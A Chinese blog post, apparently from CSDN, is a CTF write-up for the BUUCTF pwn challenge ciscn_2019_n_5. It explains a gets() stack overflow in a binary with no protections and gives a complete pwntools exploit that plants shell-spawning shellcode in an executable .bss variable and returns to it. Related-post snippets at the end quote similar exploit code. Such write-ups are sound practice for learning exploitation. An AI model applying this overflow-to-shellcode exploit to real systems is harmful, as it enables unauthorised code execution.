BUUCTF pwn——ciscn_2019_n_5

于 2023-04-07 16:09:30 发布
阅读量158 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/130014100
版权

checksec

在这里插入图片描述

运行

直接输入就行
在这里插入图片描述

ida&gdb

main函数里:

  • name是全局变量,且存放在.bss段,地址在ELF文件中位于数据段,编译链接时由动态链接器进行初始化,因此在运行时可以它就同时具有RWX权限,可以用来存放shellcode
  • get(v4)存在溢出
    mainbss数据段

给v4分配的栈空间为0x28

在这里插入图片描述

利用思路

可RWX的全局变量存储shellcode,局部变量溢出调用shellcode

代码

'''
@Author       : 白银
@Date         : 2023-04-07 15:04:00
@LastEditors  : 白银
@LastEditTime : 2023-04-07 16:03:50
@FilePath     : /pwn/ciscn_2019_n_5.py
@Description  : https://buuoj.cn/challenges#ciscn_2019_n_5
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
# from libcfind import *

set_arch = 0  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './ciscn_2019_n_5'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 26271)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    libc = elf.libc
    # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

return_addr = 0x601080  # p &name,可以rwx的全局变量,此题的name存放在bss段,在elf文件中位于data段,可rwx
padding = 0x28  # ida看上限到r的距离

payload1 = flat([asm(shellcraft.sh())])
io.sendlineafter('tell me your name', payload1)

payload2 = flat(['a' * padding, return_addr])
io.sendlineafter('What do you want to say to me?', payload2)

io.interactive()

拿到shell,cat flag

在这里插入图片描述

Captain杰派罗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn-2019-pwn
11-29
1. baby_pwn 2. bms 3. daily 4. Double 5 your_pwn
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 297
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 654
[buuctf]ciscn_2019_n_5
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3159
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1384
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUUCTFPWNciscn_2019_n_5 shellcode
m0_55368674的博客
01-13 370
BUUCTFPWNciscn_2019_n_5题解
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1575
buuctf ciscn_2019_ne_5题目分析
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 495
ciscn_2019_ne_5 BUUCTF
buuctf|pwn-ciscn_2019_n_5-wp
l2645470582_的博客
11-09 187
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,没有看到‘/bin/sh’可以拿到权限类的字符串 3.我们进入main函数看看 我们可以看出gets(text,name)这里造成溢出 我们再去看看name,然后发现name是bss段上的全局变量 又因为该题没有system("/bin/sh")的字样,所以我们可以向bss段写入shellcode拿到权限 shellcode = asm(shellcraft.sh()...
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 1849
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
ciscn_2019_n_5
m0sway的博客
03-29 200
ciscn_2019_n_5 WriteUp BUU_PWN
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 500
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 777
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1076
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 444
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
buuctf pwn 第五空间决赛pwn5
最新发布
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值